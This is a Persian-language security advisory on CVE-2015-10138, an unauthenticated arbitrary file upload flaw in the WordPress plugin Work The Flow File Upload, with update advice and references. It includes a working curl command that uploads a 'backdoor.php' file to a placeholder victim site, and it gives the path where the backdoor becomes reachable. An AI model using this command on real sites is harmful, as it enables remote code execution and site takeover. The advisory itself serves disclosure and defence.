افزونهی Work The Flow File Upload در وردپرس امکان آپلود فایل توسط کاربران را فراهم میکند و همچنین قابلیت تعریف فرآیند کاری را دارد که میتواند شامل مراحلی مانند بارگذاری فایل، نمایش گالری تصاویر، آرشیو کردن و مرتبسازی فایلها باشد.
افزونه Work The Flow File Upload در وردپرس به دلیل نبود اعتبارسنجی نوع فایل در فایلهای سرور و تست jQuery-File-Upload-9.5.0، در نسخههای قبل از 2.5.2 در برابر آپلود فایل دلخواه آسیبپذیر است.
این آسیبپذیری به مهاجمان غیرمجاز این امکان را میدهد که فایلهایی با هر نوعی را در سرور سایت آسیبدیده آپلود کنند که میتواند منجر به اجرای کد از راه دور شود.
curl -k -X POST -F "action=upload" -F "files=@./backdoor.php" http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/s…
دستور فوق جهت آپلود فایل backdoor.php به آدرس مشخصی در سایت قربانی استفاده میشود. پس از آپلود موفق، فایل backdoor در آدرس زیر قابل دسترسی خواهد بود:
http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/s…
محصولات آسیبپذیر
- نسخههای قبل از 2.5.2
توصیههای امنیتی
- به کاربران توصیه میشود برای رفع آسیبپذیری، این افزونه را به نسخهی 2.5.3 بهروزرسانی نمایند.
منابع خبر:
[1]https://nvd.nist.gov/vuln/detail/CVE-2015-10138
[2]https://wpscan.com/vulnerability/a49a81a9-3d4b-4c8d-b719-fc513aceecc6
- 27